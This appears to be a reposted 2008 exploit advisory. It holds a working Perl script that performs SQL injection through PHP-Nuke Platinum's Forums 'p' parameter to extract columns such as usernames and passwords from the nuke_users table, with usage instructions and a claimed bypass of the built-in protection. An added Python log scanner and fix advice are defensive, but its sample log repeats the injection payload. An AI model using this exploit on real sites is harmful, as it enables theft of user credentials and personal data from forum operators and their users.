PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit
Source: www.vfocus.net Author: vfocus Published: 2008-03-25

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum, Forums (Standard) - magic_quotes_gpc = OFF, SQL Injection
#nuke_users Structure:
#  user_id  name  username  user_email  femail  user_website  user_avatar  user_regdate  user_icq
#  user_occ  user_from  user_interests  user_sig  user_viewemail  user_theme  user_aim  user_yim
#  user_msnm  user_password  storynum  umode  uorder  thold  noscore  bio  ublockon  ublock  theme
#  commentmax  counter  newsletter  user_posts  user_attachsig  user_rank  user_level  broadcast
#  popmeson  user_active  user_session_time  user_session_page  user_lastvisit  user_timezone
#  user_style  user_lang  user_dateformat  user_new_privmsg  user_unread_privmsg  user_last_privmsg
#  user_emailtime  user_allowhtml  user_allowbbcode  user_allowsmile  user_allowavatar
#  user_allow_pm  user_allow_viewonline  user_notify  user_notify_pm  user_popup_pm
#  user_avatar_type  user_sig_bbcode_uid  user_actkey  user_newpasswd  last_ip  user_color_gc
#  user_color_gi  user_quickreply  user_allow_arcadepm  kick_ban  user_wordwrap  agreedtos
#  user_view_log  user_effects  user_privs  user_custitle  user_specmsg  user_items  user_trade
#  points  user_cash  last_seen_blocker  user_login_tries  user_last_login_try  user_gender
#  user_birthday  user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines: 44 - 427
#What about PHP-Nuke's SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc is turned off.
#You can of course edit the SQL Injection, file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy, there are more bugs for sure (e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        ${$v} = $ARGV[$a];
                }
        }
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
        $url = shift;
        $reg = shift;

        $ua = LWP::UserAgent->new;
        $urls = $url;
        $response = $ua->get($urls);
        $content = $response->content;

        if ($content=~m/$reg/) {
            ($f,$s,$l) = split(">>",$1);
            $s =~s/ Post //;
            print $column.":".$s."\n";
        }
}
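
A defender-side check for the request shape the script above sends, as an added example that is not part of the original posting: it scans web access-log lines for `modules.php?name=Forums` requests whose `p` parameter is not a plain integer. The combined log format, the sample lines, the function names, and the premise that legitimate `p` values are numeric post ids are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Assumption: a legitimate forum post id is a short run of digits.
POST_ID_RE = re.compile(r"\d{1,10}")
SQL_HINT_RE = re.compile(r"union\W+select|'|--|/\*", re.IGNORECASE)

def classify(line):
    """Return None for unrelated or benign lines, else (severity, decoded p)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("modules.php"):
        return None
    # parse_qs percent-decodes and maps '+' to a space before we inspect values.
    query = parse_qs(parts.query, keep_blank_values=True)
    if "forums" not in (v.lower() for v in query.get("name", [])):
        return None
    for value in query.get("p", []):
        if POST_ID_RE.fullmatch(value):
            continue
        severity = "sqli" if SQL_HINT_RE.search(value) else "non-numeric"
        return severity, value
    return None

def scan(lines):
    """Return (line_number, severity, decoded p value) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, *verdict))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2008:10:00:01 +0000] "GET /modules.php?name=Forums&file=viewtopic&p=1234 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Mar/2008:10:00:07 +0000] "GET /modules.php?name=Forums&p=-1%27union+select-1,username+from+nuke_users+where+user_id=%272 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [25/Mar/2008:10:00:09 +0000] "GET /modules.php?name=News&p=abc HTTP/1.1" 200 2048',
    '192.0.2.51 - - [25/Mar/2008:10:00:12 +0000] "GET /nuke/modules.php?name=Forums&p=12abc HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, severity, value in scan(SAMPLE_LOG):
        print(f"line {number}: {severity}: p={value!r}")
```

The same integer-only rule applied server-side to `p`, before it reaches the query in includes/dynamic_titles.php, closes the injection regardless of the magic_quotes_gpc setting.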


 